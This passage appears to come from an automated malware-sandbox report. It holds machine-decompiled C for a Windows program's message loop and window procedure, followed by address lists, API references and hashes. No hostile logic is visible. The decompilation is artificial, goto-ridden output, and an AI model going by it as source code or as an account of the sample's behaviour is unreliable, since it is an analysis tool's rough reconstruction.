                                                                                                                                                              				_t35 =  *(_t69 + 0x54);
                                                                                                                                                              				if(_t35 == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					_t36 =  *(_t69 + 0x18);
                                                                                                                                                              					 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                              						if(_a4 == 0xffffffff) {
                                                                                                                                                              							GetMessageA( &_v32, 0, 0, 0);
                                                                                                                                                              							L15:
                                                                                                                                                              							_t61 = GetActiveWindow();
                                                                                                                                                              							_t40 = E00405D3C(_t63, _t61);
                                                                                                                                                              							if(_t40 == 0) {
                                                                                                                                                              								L17:
                                                                                                                                                              								TranslateMessage( &_v32);
                                                                                                                                                              								DispatchMessageA( &_v32);
                                                                                                                                                              								L18:
                                                                                                                                                              								_t45 =  *((intOrPtr*)(_t69 + 0xc));
                                                                                                                                                              								if(_t45 == 0) {
                                                                                                                                                              									_a4 = _v32.message;
                                                                                                                                                              									 *((intOrPtr*)(_t69 + 0x10)) = _v32.wParam;
                                                                                                                                                              									 *((intOrPtr*)(_t69 + 0x14)) = _v32.lParam;
                                                                                                                                                              								} else {
                                                                                                                                                              									_a4 = _t45;
                                                                                                                                                              									 *((intOrPtr*)(_t69 + 0xc)) = 0;
                                                                                                                                                              								}
                                                                                                                                                              								L21:
                                                                                                                                                              								return _a4;
                                                                                                                                                              							}
                                                                                                                                                              							_push( &_v32);
                                                                                                                                                              							_push(_t40);
                                                                                                                                                              							_push(_t61);
                                                                                                                                                              							if( *0x40a804() != 0) {
                                                                                                                                                              								goto L18;
                                                                                                                                                              							}
                                                                                                                                                              							goto L17;
                                                                                                                                                              						}
                                                                                                                                                              						if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              						if(_a4 != 0) {
                                                                                                                                                              							if(MsgWaitForMultipleObjects(0, 0, 0, _a4, 0x1ff) == 0x102) {
                                                                                                                                                              								goto L10;
                                                                                                                                                              							}
                                                                                                                                                              							if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
                                                                                                                                                              								goto L15;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						L10:
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              					_a4 =  *(_t36 + 4);
                                                                                                                                                              					 *((intOrPtr*)(_t69 + 4)) =  *((intOrPtr*)(_t36 + 8));
                                                                                                                                                              					 *((intOrPtr*)(_t69 + 0xc)) = 0;
                                                                                                                                                              					 *(_t69 + 0x18) =  *_t36;
                                                                                                                                                              					HeapFree( *0x40b0f8, 0, _t36);
                                                                                                                                                              					if( *(_t69 + 0x18) == 0) {
                                                                                                                                                              						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                                                                                                                                                              					}
                                                                                                                                                              					goto L21;
                                                                                                                                                              				}
                                                                                                                                                              				_t57 =  *(_t35 + 0x14);
                                                                                                                                                              				if(_t57 != 0) {
                                                                                                                                                              					HeapFree( *0x40b0f8, 0, _t57);
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree( *0x40b0f8, 0,  *(_t69 + 0x54));
                                                                                                                                                              				 *(_t69 + 0x54) = 0;
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}












                                                                                                                                                              0x00404f3e
                                                                                                                                                              0x00404f40
                                                                                                                                                              0x00404f47
                                                                                                                                                              0x00404f69
                                                                                                                                                              0x00404f69
                                                                                                                                                              0x00404f6c
                                                                                                                                                              0x00404f72
                                                                                                                                                              0x00404faa
                                                                                                                                                              0x00404ff7
                                                                                                                                                              0x00404ffd
                                                                                                                                                              0x00405003
                                                                                                                                                              0x00405006
                                                                                                                                                              0x0040500d
                                                                                                                                                              0x0040501f
                                                                                                                                                              0x00405023
                                                                                                                                                              0x0040502d
                                                                                                                                                              0x00405033
                                                                                                                                                              0x00405033
                                                                                                                                                              0x00405038
                                                                                                                                                              0x00405045
                                                                                                                                                              0x0040504b
                                                                                                                                                              0x00405051
                                                                                                                                                              0x0040503a
                                                                                                                                                              0x0040503a
                                                                                                                                                              0x0040503d
                                                                                                                                                              0x0040503d
                                                                                                                                                              0x00405054
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405054
                                                                                                                                                              0x00405012
                                                                                                                                                              0x00405013
                                                                                                                                                              0x00405014
                                                                                                                                                              0x0040501d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040501d
                                                                                                                                                              0x00404fbc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404fc1
                                                                                                                                                              0x00404fe0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404fef
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404ff1
                                                                                                                                                              0x00404fc3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404fc3
                                                                                                                                                              0x00404f77
                                                                                                                                                              0x00404f7d
                                                                                                                                                              0x00404f80
                                                                                                                                                              0x00404f87
                                                                                                                                                              0x00404f90
                                                                                                                                                              0x00404f95
                                                                                                                                                              0x00404f9b
                                                                                                                                                              0x00404f9b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404f95
                                                                                                                                                              0x00404f49
                                                                                                                                                              0x00404f4e
                                                                                                                                                              0x00404f58
                                                                                                                                                              0x00404f58
                                                                                                                                                              0x00404f64
                                                                                                                                                              0x00404f66
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00404F58
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00404F64
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00404F90
                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FB8
                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,000000FF,000001FF), ref: 00404FD5
                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FEB
                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404FF7
                                                                                                                                                              • GetActiveWindow.USER32 ref: 00404FFD
                                                                                                                                                              • TranslateAccelerator.USER32(00000000,00000000,?), ref: 00405015
                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00405023
                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0040502D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$FreeHeap$PeekTranslate$AcceleratorActiveDispatchMultipleObjectsWaitWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1286715895-0
                                                                                                                                                              • Opcode ID: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                                                                                                                                              • Instruction ID: df21f5fe5c289298ab728cd37bb52f6d8c99b9184479e931f6e0fc541ff44454
                                                                                                                                                              • Opcode Fuzzy Hash: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                                                                                                                                              • Instruction Fuzzy Hash: 14415CB0900706EFCB20DF65DD88C6BBBF8EB85740710853AF556E62A0D338D945CB69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                              			E004056EF(struct HWND__* _a4, intOrPtr _a8, struct HDC__* _a12, signed int _a16) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				struct HWND__* _v12;
                                                                                                                                                              				struct tagRECT _v28;
                                                                                                                                                              				signed int* _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				struct HWND__* _t97;
                                                                                                                                                              				signed int _t98;
                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                              				struct HBRUSH__* _t100;
                                                                                                                                                              				struct HBRUSH__* _t102;
                                                                                                                                                              				signed short _t110;
                                                                                                                                                              				signed short _t111;
                                                                                                                                                              				signed short _t112;
                                                                                                                                                              				signed short _t113;
                                                                                                                                                              				void* _t118;
                                                                                                                                                              				unsigned int _t120;
                                                                                                                                                              				long _t123;
                                                                                                                                                              				struct HWND__* _t125;
                                                                                                                                                              				void* _t131;
                                                                                                                                                              				void* _t134;
                                                                                                                                                              				struct HBRUSH__* _t137;
                                                                                                                                                              				struct HBRUSH__* _t140;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				void* _t145;
                                                                                                                                                              				struct HWND__* _t147;
                                                                                                                                                              				intOrPtr* _t148;
                                                                                                                                                              				struct HBRUSH__* _t149;
                                                                                                                                                              				struct HBRUSH__* _t150;
                                                                                                                                                              				signed int _t151;
                                                                                                                                                              				signed int _t155;
                                                                                                                                                              				struct HWND__* _t156;
                                                                                                                                                              				signed int* _t157;
                                                                                                                                                              				void* _t172;
                                                                                                                                                              
                                                                                                                                                              				_t148 = 0;
                                                                                                                                                              				_t95 = E0040642D( *0x40b430);
                                                                                                                                                              				_t156 = _a16;
                                                                                                                                                              				_t157 = _t95;
                                                                                                                                                              				_t96 = E0040523F(_a4, _a8, _a12, _t156);
                                                                                                                                                              				if(_t96 != 0xd0d0d0d1) {
                                                                                                                                                              					L105:
                                                                                                                                                              					return _t96;
                                                                                                                                                              				}
                                                                                                                                                              				_t97 = _a4;
                                                                                                                                                              				_v12 = _t97;
                                                                                                                                                              				if(_t97 == 0) {
                                                                                                                                                              					L6:
                                                                                                                                                              					_t15 =  &_v8;
                                                                                                                                                              					 *_t15 = _v8 | 0xffffffff;
                                                                                                                                                              					__eflags =  *_t15;
                                                                                                                                                              					L7:
                                                                                                                                                              					_t155 = 0;
                                                                                                                                                              					if(_t148 == 0) {
                                                                                                                                                              						L21:
                                                                                                                                                              						_t98 = _t157[0x14];
                                                                                                                                                              						__eflags = _t98 - _t155;
                                                                                                                                                              						if(_t98 == _t155) {
                                                                                                                                                              							L11:
                                                                                                                                                              							_t99 = _a8;
                                                                                                                                                              							_t151 = _v8;
                                                                                                                                                              							_a16 = 0xd0d0d0d1;
                                                                                                                                                              							_t157[1] = _t151;
                                                                                                                                                              							if(_t99 > 0x115) {
                                                                                                                                                              								__eflags = _t99 - 0x332f;
                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                              									_t100 = _t99 - 0x3331;
                                                                                                                                                              									__eflags = _t100;
                                                                                                                                                              									if(_t100 == 0) {
                                                                                                                                                              										_t157[3] = 0x3331;
                                                                                                                                                              										L102:
                                                                                                                                                              										_t157[0x15] = _t156;
                                                                                                                                                              										L103:
                                                                                                                                                              										_a16 = _t155;
                                                                                                                                                              										L104:
                                                                                                                                                              										return _a16;
                                                                                                                                                              									}
                                                                                                                                                              									_t102 = _t100 - 1;
                                                                                                                                                              									__eflags = _t102;
                                                                                                                                                              									if(_t102 == 0) {
                                                                                                                                                              										_t157[3] = 0x3332;
                                                                                                                                                              										 *_t157 = _a12;
                                                                                                                                                              										goto L102;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _t102 != 0xe;
                                                                                                                                                              									if(_t102 != 0xe) {
                                                                                                                                                              										goto L104;
                                                                                                                                                              									}
                                                                                                                                                              									L98:
                                                                                                                                                              									_push(_t156);
                                                                                                                                                              									_push(_a12);
                                                                                                                                                              									_push(_a8);
                                                                                                                                                              									_push(_a4);
                                                                                                                                                              									_push(_t156);
                                                                                                                                                              									L99:
                                                                                                                                                              									_a16 = E00405625();
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                              									_t157[3] = 0x332c;
                                                                                                                                                              									 *_t157 = _a12;
                                                                                                                                                              									_t157[2] = _t156;
                                                                                                                                                              									goto L103;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x133;
                                                                                                                                                              								if(_t99 < 0x133) {
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x135;
                                                                                                                                                              								if(_t99 <= 0x135) {
                                                                                                                                                              									goto L98;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x138;
                                                                                                                                                              								if(_t99 == 0x138) {
                                                                                                                                                              									goto L98;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x30d5;
                                                                                                                                                              								if(_t99 == 0x30d5) {
                                                                                                                                                              									PostMessageA(_a4, 0x30d6, _a12, _t156);
                                                                                                                                                              									L63:
                                                                                                                                                              									_a16 = _a16 & 0x00000000;
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x30d6;
                                                                                                                                                              								if(_t99 != 0x30d6) {
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t156 - 0x203;
                                                                                                                                                              								_t157[3] = 0x332e;
                                                                                                                                                              								 *_t157 = _a12;
                                                                                                                                                              								if(_t156 != 0x203) {
                                                                                                                                                              									__eflags = _t156 - 0x206;
                                                                                                                                                              									if(_t156 != 0x206) {
                                                                                                                                                              										__eflags = _t156 - 0x201;
                                                                                                                                                              										if(_t156 != 0x201) {
                                                                                                                                                              											__eflags = _t156 - 0x204;
                                                                                                                                                              											if(_t156 != 0x204) {
                                                                                                                                                              												_t157[3] = _t155;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t157[2] = 1;
                                                                                                                                                              											}
                                                                                                                                                              										} else {
                                                                                                                                                              											_t157[2] = _t155;
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										_t157[2] = 3;
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									_t157[2] = 2;
                                                                                                                                                              								}
                                                                                                                                                              								goto L103;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t99 >= 0x114) {
                                                                                                                                                              								goto L98;
                                                                                                                                                              							}
                                                                                                                                                              							_t172 = _t99 - 0x14;
                                                                                                                                                              							if(_t172 > 0) {
                                                                                                                                                              								__eflags = _t99 - 0x15;
                                                                                                                                                              								if(_t99 == 0x15) {
                                                                                                                                                              									__eflags = _t148 - _t155;
                                                                                                                                                              									if(_t148 != _t155) {
                                                                                                                                                              										__eflags =  *((intOrPtr*)(_t148 + 0x1c)) - _t155;
                                                                                                                                                              										if( *((intOrPtr*)(_t148 + 0x1c)) == _t155) {
                                                                                                                                                              											EnumChildWindows(_a4, E004056D9, 0);
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x24;
                                                                                                                                                              								if(_t99 == 0x24) {
                                                                                                                                                              									__eflags = _t148 - _t155;
                                                                                                                                                              									if(_t148 == _t155) {
                                                                                                                                                              										goto L104;
                                                                                                                                                              									}
                                                                                                                                                              									_t110 =  *(_t148 + 0x24) & 0x0000ffff;
                                                                                                                                                              									__eflags = _t110 - _t155;
                                                                                                                                                              									if(_t110 != _t155) {
                                                                                                                                                              										 *(_t156 + 0x18) = _t110 & 0x0000ffff;
                                                                                                                                                              									}
                                                                                                                                                              									_t111 =  *(_t148 + 0x26) & 0x0000ffff;
                                                                                                                                                              									__eflags = _t111 - _t155;
                                                                                                                                                              									if(_t111 != _t155) {
                                                                                                                                                              										 *(_t156 + 0x1c) = _t111 & 0x0000ffff;
                                                                                                                                                              									}
                                                                                                                                                              									_t112 =  *(_t148 + 0x28) & 0x0000ffff;
                                                                                                                                                              									__eflags = _t112 - _t155;
                                                                                                                                                              									if(_t112 != _t155) {
                                                                                                                                                              										 *(_t156 + 0x20) = _t112 & 0x0000ffff;
                                                                                                                                                              									}
                                                                                                                                                              									_t113 =  *(_t148 + 0x2a) & 0x0000ffff;
                                                                                                                                                              									__eflags = _t113 - _t155;
                                                                                                                                                              									if(_t113 != _t155) {
                                                                                                                                                              										 *(_t156 + 0x24) = _t113 & 0x0000ffff;
                                                                                                                                                              									}
                                                                                                                                                              									goto L103;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x4e;
                                                                                                                                                              								if(_t99 == 0x4e) {
                                                                                                                                                              									_push(_t156);
                                                                                                                                                              									_push(_a12);
                                                                                                                                                              									_push(0x4e);
                                                                                                                                                              									_push(_a4);
                                                                                                                                                              									_push(_t156->i);
                                                                                                                                                              									goto L99;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t99 - 0x111;
                                                                                                                                                              								if(_t99 != 0x111) {
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								_t149 = _a12;
                                                                                                                                                              								_t118 = E00405625(_t156, _a4, 0x111, _t149, _t156);
                                                                                                                                                              								__eflags = _t118 - 0xd0d0d0d1;
                                                                                                                                                              								if(_t118 != 0xd0d0d0d1) {
                                                                                                                                                              									goto L63;
                                                                                                                                                              								}
                                                                                                                                                              								_t120 = _t149 >> 0x10;
                                                                                                                                                              								__eflags = _t156;
                                                                                                                                                              								if(_t156 == 0) {
                                                                                                                                                              									__eflags = _t120;
                                                                                                                                                              									if(_t120 == 0) {
                                                                                                                                                              										L54:
                                                                                                                                                              										 *_t157 = _t149;
                                                                                                                                                              										L62:
                                                                                                                                                              										_t157[3] = 0x332d;
                                                                                                                                                              										goto L63;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _t149 - 0xfa01;
                                                                                                                                                              									if(_t149 != 0xfa01) {
                                                                                                                                                              										__eflags = _t149 - 0xfa02;
                                                                                                                                                              										if(_t149 != 0xfa02) {
                                                                                                                                                              											 *_t157 = _t149 & 0x0000ffff;
                                                                                                                                                              											goto L62;
                                                                                                                                                              										}
                                                                                                                                                              										_push(1);
                                                                                                                                                              										L58:
                                                                                                                                                              										E00405C70();
                                                                                                                                                              										goto L63;
                                                                                                                                                              									}
                                                                                                                                                              									_push(0);
                                                                                                                                                              									goto L58;
                                                                                                                                                              								}
                                                                                                                                                              								_t157[3] = 0x332c;
                                                                                                                                                              								_t157[2] = _t120;
                                                                                                                                                              								_t123 = GetWindowLongA(_t156, 0xfffffff4);
                                                                                                                                                              								__eflags = _t123 - 0xffffd8f0;
                                                                                                                                                              								 *_t157 = _t123;
                                                                                                                                                              								if(_t123 != 0xffffd8f0) {
                                                                                                                                                              									goto L63;
                                                                                                                                                              								}
                                                                                                                                                              								_t149 = _t149 & 0x0000ffff;
                                                                                                                                                              								__eflags = _t149;
                                                                                                                                                              								goto L54;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t172 == 0) {
                                                                                                                                                              								__eflags = _t148 - _t155;
                                                                                                                                                              								if(_t148 != _t155) {
                                                                                                                                                              									__eflags =  *(_t148 + 0x18);
                                                                                                                                                              									if( *(_t148 + 0x18) == 0) {
                                                                                                                                                              										_t125 = _a4;
                                                                                                                                                              										__eflags =  *_t148 - _t125;
                                                                                                                                                              										if( *_t148 == _t125) {
                                                                                                                                                              											_t150 =  *(_t148 + 0x20);
                                                                                                                                                              											__eflags = _t150;
                                                                                                                                                              											if(_t150 != 0) {
                                                                                                                                                              												_a16 = _t150->i(_a12, _t125);
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										GetClientRect(_a4,  &_v28);
                                                                                                                                                              										FillRect(_a12,  &_v28,  *(_t148 + 0x18));
                                                                                                                                                              										_a16 = 1;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								E00405685(_t157, 0xf, _v8);
                                                                                                                                                              								goto L104;
                                                                                                                                                              							}
                                                                                                                                                              							_t131 = _t99 - 3;
                                                                                                                                                              							if(_t131 == 0) {
                                                                                                                                                              								L19:
                                                                                                                                                              								if(_t151 != 0xffffffff) {
                                                                                                                                                              									E00405685(_t157, _a8, _v8);
                                                                                                                                                              									_t155 = 0;
                                                                                                                                                              								}
                                                                                                                                                              								goto L103;
                                                                                                                                                              							}
                                                                                                                                                              							_t134 = _t131;
                                                                                                                                                              							if(_t134 == 0) {
                                                                                                                                                              								__eflags = _v12 - _a4;
                                                                                                                                                              								if(_v12 != _a4) {
                                                                                                                                                              									L25:
                                                                                                                                                              									_a16 = 1;
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t151 - 0xffffffff;
                                                                                                                                                              								if(_t151 == 0xffffffff) {
                                                                                                                                                              									goto L104;
                                                                                                                                                              								}
                                                                                                                                                              								_t137 = _a12 - _t155;
                                                                                                                                                              								__eflags = _t137;
                                                                                                                                                              								if(_t137 == 0) {
                                                                                                                                                              									__eflags =  *(_t148 + 0x2c) - _t155;
                                                                                                                                                              									if( *(_t148 + 0x2c) == _t155) {
                                                                                                                                                              										L36:
                                                                                                                                                              										_push(_v8);
                                                                                                                                                              										L37:
                                                                                                                                                              										_push(5);
                                                                                                                                                              										L38:
                                                                                                                                                              										_push(_t157);
                                                                                                                                                              										E00405685();
                                                                                                                                                              										goto L63;
                                                                                                                                                              									} else {
                                                                                                                                                              										_push(_v8);
                                                                                                                                                              										_t39 = _t148 + 0x2c;
                                                                                                                                                              										 *_t39 =  *(_t148 + 0x2c) & 0x00000000;
                                                                                                                                                              										__eflags =  *_t39;
                                                                                                                                                              										_push(0x3335);
                                                                                                                                                              										L35:
                                                                                                                                                              										_push(_t157);
                                                                                                                                                              										E00405685();
                                                                                                                                                              										goto L36;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								_t140 = _t137 - 1;
                                                                                                                                                              								__eflags = _t140;
                                                                                                                                                              								_push(_v8);
                                                                                                                                                              								if(_t140 == 0) {
                                                                                                                                                              									 *(_t148 + 0x2c) = 1;
                                                                                                                                                              									_push(0x3333);
                                                                                                                                                              									goto L38;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t140 != 1;
                                                                                                                                                              								if(_t140 != 1) {
                                                                                                                                                              									goto L37;
                                                                                                                                                              								} else {
                                                                                                                                                              									 *(_t148 + 0x2c) = 1;
                                                                                                                                                              									_push(0x3334);
                                                                                                                                                              									goto L35;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							_t142 = _t134 - 1;
                                                                                                                                                              							if(_t142 == 0) {
                                                                                                                                                              								__eflags = _a12 - _t155;
                                                                                                                                                              								if(_a12 != _t155) {
                                                                                                                                                              									E00405685(_t157, 0x3330, _v8);
                                                                                                                                                              								}
                                                                                                                                                              								goto L25;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t142 != 0xa) {
                                                                                                                                                              								goto L104;
                                                                                                                                                              							}
                                                                                                                                                              							goto L19;
                                                                                                                                                              						} else {
                                                                                                                                                              							L9:
                                                                                                                                                              							_t96 =  *_t98(_a4, _a8, _a12, _t156);
                                                                                                                                                              							if(_t96 != 0xe0e0e0e1) {
                                                                                                                                                              								goto L105;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t155 = 0;
                                                                                                                                                              								goto L11;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t98 =  *(_t148 + 0xc);
                                                                                                                                                              					if(_t98 == 0) {
                                                                                                                                                              						goto L21;
                                                                                                                                                              					}
                                                                                                                                                              					goto L9;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L2;
                                                                                                                                                              				}
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L2:
                                                                                                                                                              					_t145 = GetPropA(_v12, "PB_WindowID");
                                                                                                                                                              					_v8 = _t145;
                                                                                                                                                              					if(_t145 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t147 = GetParent(_v12);
                                                                                                                                                              					_v12 = _t147;
                                                                                                                                                              					if(_t147 != 0) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				if(_v12 == _t148) {
                                                                                                                                                              					goto L6;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v8 = _v8 - 1;
                                                                                                                                                              					_t148 = E00406690( *0x40b42c, _v8);
                                                                                                                                                              					goto L7;
                                                                                                                                                              				}
                                                                                                                                                              			}




































                                                                                                                                                              0x004056fe
                                                                                                                                                              0x00405700
                                                                                                                                                              0x00405705
                                                                                                                                                              0x0040570c
                                                                                                                                                              0x00405714
                                                                                                                                                              0x0040571e
                                                                                                                                                              0x00405b1c
                                                                                                                                                              0x00405b1c
                                                                                                                                                              0x00405b1c
                                                                                                                                                              0x00405724
                                                                                                                                                              0x00405729
                                                                                                                                                              0x0040572c
                                                                                                                                                              0x0040576d
                                                                                                                                                              0x0040576d
                                                                                                                                                              0x0040576d
                                                                                                                                                              0x0040576d
                                                                                                                                                              0x00405771
                                                                                                                                                              0x00405771
                                                                                                                                                              0x00405775
                                                                                                                                                              0x00405801
                                                                                                                                                              0x00405801
                                                                                                                                                              0x00405804
                                                                                                                                                              0x00405806
                                                                                                                                                              0x0040579b
                                                                                                                                                              0x0040579b
                                                                                                                                                              0x004057a3
                                                                                                                                                              0x004057a6
                                                                                                                                                              0x004057ad
                                                                                                                                                              0x004057b0
                                                                                                                                                              0x00405a15
                                                                                                                                                              0x00405a17
                                                                                                                                                              0x00405ada
                                                                                                                                                              0x00405ada
                                                                                                                                                              0x00405adc
                                                                                                                                                              0x00405b0c
                                                                                                                                                              0x00405b0f
                                                                                                                                                              0x00405b0f
                                                                                                                                                              0x00405b12
                                                                                                                                                              0x00405b12
                                                                                                                                                              0x00405b15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b15
                                                                                                                                                              0x00405ade
                                                                                                                                                              0x00405ade
                                                                                                                                                              0x00405adf
                                                                                                                                                              0x00405b01
                                                                                                                                                              0x00405b08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405b08
                                                                                                                                                              0x00405ae1
                                                                                                                                                              0x00405ae4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ae6
                                                                                                                                                              0x00405ae6
                                                                                                                                                              0x00405ae7
                                                                                                                                                              0x00405aea
                                                                                                                                                              0x00405aed
                                                                                                                                                              0x00405af0
                                                                                                                                                              0x00405af1
                                                                                                                                                              0x00405af9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405af9
                                                                                                                                                              0x00405a1d
                                                                                                                                                              0x00405ac7
                                                                                                                                                              0x00405ace
                                                                                                                                                              0x00405ad0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ad0
                                                                                                                                                              0x00405a23
                                                                                                                                                              0x00405a28
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405a2e
                                                                                                                                                              0x00405a33
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405a39
                                                                                                                                                              0x00405a3e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405a44
                                                                                                                                                              0x00405a49
                                                                                                                                                              0x00405ab9
                                                                                                                                                              0x00405984
                                                                                                                                                              0x00405984
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405984
                                                                                                                                                              0x00405a4b
                                                                                                                                                              0x00405a50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405a56
                                                                                                                                                              0x00405a5f
                                                                                                                                                              0x00405a66
                                                                                                                                                              0x00405a68
                                                                                                                                                              0x00405a76
                                                                                                                                                              0x00405a7c
                                                                                                                                                              0x00405a8a
                                                                                                                                                              0x00405a90
                                                                                                                                                              0x00405a97
                                                                                                                                                              0x00405a9d
                                                                                                                                                              0x00405aa8
                                                                                                                                                              0x00405a9f
                                                                                                                                                              0x00405a9f
                                                                                                                                                              0x00405a9f
                                                                                                                                                              0x00405a92
                                                                                                                                                              0x00405a92
                                                                                                                                                              0x00405a92
                                                                                                                                                              0x00405a7e
                                                                                                                                                              0x00405a7e
                                                                                                                                                              0x00405a7e
                                                                                                                                                              0x00405a6a
                                                                                                                                                              0x00405a6a
                                                                                                                                                              0x00405a6a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405a68
                                                                                                                                                              0x004057bb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004057c1
                                                                                                                                                              0x004057c4
                                                                                                                                                              0x004058e8
                                                                                                                                                              0x004058eb
                                                                                                                                                              0x004059ea
                                                                                                                                                              0x004059ec
                                                                                                                                                              0x004059f2
                                                                                                                                                              0x004059f5
                                                                                                                                                              0x00405a05
                                                                                                                                                              0x00405a05
                                                                                                                                                              0x004059f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004059ec
                                                                                                                                                              0x004058f1
                                                                                                                                                              0x004058f4
                                                                                                                                                              0x0040599d
                                                                                                                                                              0x0040599f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004059a5
                                                                                                                                                              0x004059a9
                                                                                                                                                              0x004059ac
                                                                                                                                                              0x004059b1
